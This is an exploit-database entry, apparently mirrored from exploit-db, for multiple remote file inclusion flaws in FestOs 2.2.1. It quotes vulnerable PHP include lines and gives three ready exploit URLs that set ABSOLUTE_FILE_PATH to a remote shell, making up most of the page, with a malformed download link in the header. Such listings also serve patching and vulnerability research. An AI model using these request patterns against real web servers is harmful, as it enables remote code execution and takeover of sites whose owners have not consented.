[] NeoSense
E X P L O I T S
title author type platform port cve id

FestOs 2.2.1 - Multiple Remote File Inclusions

Author: cr4wl3r
type: webapps
platform: php
port: 
date_added: 2009-12-18 
date_updated:  
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comfestos_2_2_1.tar.gz
##################################################################
## Exploit Title: FestOs <= 2.2.1 Multiple RFI Exploit          ##
## Date: 19-12-2009                                             ##
## Author: cr4wl3r                                              ##
## Software Link: http://code.google.com/p/festos/downloads/list##
## Version: N/A                                                 ##
## Tested on: GNU/LINUX                                         ##
##################################################################

~ Code : [reports_placement.php]

<?php
$title = "Jury Sheet Report";

require_once($config['ABSOLUTE_FILE_PATH'].'core/core.php');
if($_SESSION["roleID"] > $reports) {
   header("Location:index.php");
}
include "includes/reportheader.php";
?>


~ 3xplo!t :

[festos_path]/admin/reports_placement.php?ABSOLUTE_FILE_PATH=[Shell]


~ Code : [FestOS.php]

require_once($config['ABSOLUTE_FILE_PATH']."core/sessions.php");


~ 3xplo!t :

[festos_path]/core/FestOS.php?ABSOLUTE_FILE_PATH=[Shell]



~ Code : [reportheader.php]

require_once($config['ABSOLUTE_FILE_PATH'].'core/core.php');


~ 3xplo!t :

[festos_path]/admin/includes/reportheader.php?ABSOLUTE_FILE_PATH=[Shell]


and more...
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.